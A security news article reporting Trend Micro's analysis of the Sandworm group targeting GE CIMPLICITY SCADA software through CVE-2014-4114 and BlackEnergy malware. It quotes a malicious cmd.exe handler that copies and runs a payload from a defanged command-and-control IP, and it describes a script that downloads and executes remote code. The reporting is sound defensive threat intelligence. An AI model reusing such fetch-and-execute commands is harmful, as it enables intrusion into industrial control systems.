Security Experts:

Connect with us

Hi, what are you looking for?



Sandworm Team Targeted SCADA Systems: Trend Micro

Researchers at Trend Micro say the Sandworm team may have their eyes set on compromising SCADA-based systems.

Researchers at Trend Micro say the Sandworm team may have their eyes set on compromising SCADA-based systems.

SCADA (supervisory control and data acquisition) systems are used to control industrial processes. Last week, the Sandworm team was identified by researchers at iSight Partners as being at the center of attacks using CVE-2014-4114, a zero-day vulnerability in Microsoft Windows, as part of an attack campaign.

“After beginning an investigation into the affiliated malware samples and domains, we quickly came to realization that this group is very likely targeting SCADA-centric victims who are using GE Intelligent Platform’s CIMPLICITY HMI solution suite,” Trend Micro researchers Kyle Wilhoit and Jim Gogolinski explained in a blog post. “We have observed this team utilizing .cim and .bcl files as attack vectors, both of which file types are used by the CIMPLICITY software. As further proof of the malware targeting CIMPILICITY, it drops files into the CIMPLICITY installation directory using the %CIMPATH% environment variable on the victim machines.”

According to Trend Micro, the attackers were observed using emails armed with a malicious attachment that is opened by the CIMPLICITY application and attempts to exploit CVE-2014-4114 in Microsoft Windows. If the attack against the system running CIMPLICITY is successful, it attempts to download the Black Energy malware on the system. The spear-phishing emails are spoofed to appear to come from Oleh Tiahnybok, a Ukrainian politician who has been critical of Russia.  

One of the command and control servers that garnered Trend Micro’s attention was 94[.]185[.]85[.]122.

“We pivoted off this C2, and located a file called config.bak (SHA1 hash: c931be9cd2c0bd896ebe98c9304fea9e),” the researchers explained. “This file piqued our interest right off the bat, because it is a CimEdit/CimView file. A CimEdit/CimView file is an object oriented file for GE’s Cimplicity SCADA software suite, used to administer SCADA devices.

In config.bak there are two defined events – OnOpenExecCommand and ScreenOpenDispatch. According to Trend Micro, the handler of OnOpenExecCommand is the following command line:

cmd.exe /c “copy 94[.]185[.]85[.]122publicdefault.txt “%CIMPATH%CimCMSafegs.exe” && start “WOW64” “%CIMPATH%CimCMSafegs.exe”

“It’s important to note the variable %CIMPATH% is used for the drop location of default.txt,” the researchers noted. “This is a standard variable that Cimplicity uses for its installs. The handler of ScreenOpenDispatch is the subroutine start(). The subroutine start() downloads the file from hxxp://94[.]185[.]85[.]122/newsfeed.xml, saves and executes the downloaded file using cscript.exe, deletes the file after execution, and terminates the current process.”

The researchers noted that even though they are seeing CIMPLICITY being used as an attack vector, there is no indication attackers are manipulating any actual SCADA systems or data. However, since human-to-machine interfaces [HMIs] are located in both the corporate and control networks, this attack could be used to target either network segment, or used to cross from the corporate to the control network, they wrote.

CVE-2014-4114 was patched by Microsoft this month with MS14-060.

RelatedHackers Breach White House Computer System

RelatedFireEye Links Russia to Cyber Espionage Campaign Dating Back to 2007

Written By

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this webinar to learn best practices that organizations can use to improve both their resilience to new threats and their response times to incidents.


Join this live webinar as we explore the potential security threats that can arise when third parties are granted access to a sensitive data or systems.


Expert Insights

Related Content


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...

CISO Strategy

Cybersecurity-related risk is a top concern, so boards need to know they have the proper oversight in place. Even as first-timers, successful CISOs make...


The overall effect of current global geopolitical conditions is that nation states have a greater incentive to target the ICS/OT of critical industries, while...

Malware & Threats

Threat actors are increasingly abusing Microsoft OneNote documents to deliver malware in both targeted and spray-and-pray campaigns.

Malware & Threats

A vulnerability affecting IBM’s Aspera Faspex file transfer solution, tracked as CVE-2022-47986, has been exploited in attacks.

Malware & Threats

Microsoft plans to improve the protection of Office users by blocking XLL add-ins from the internet.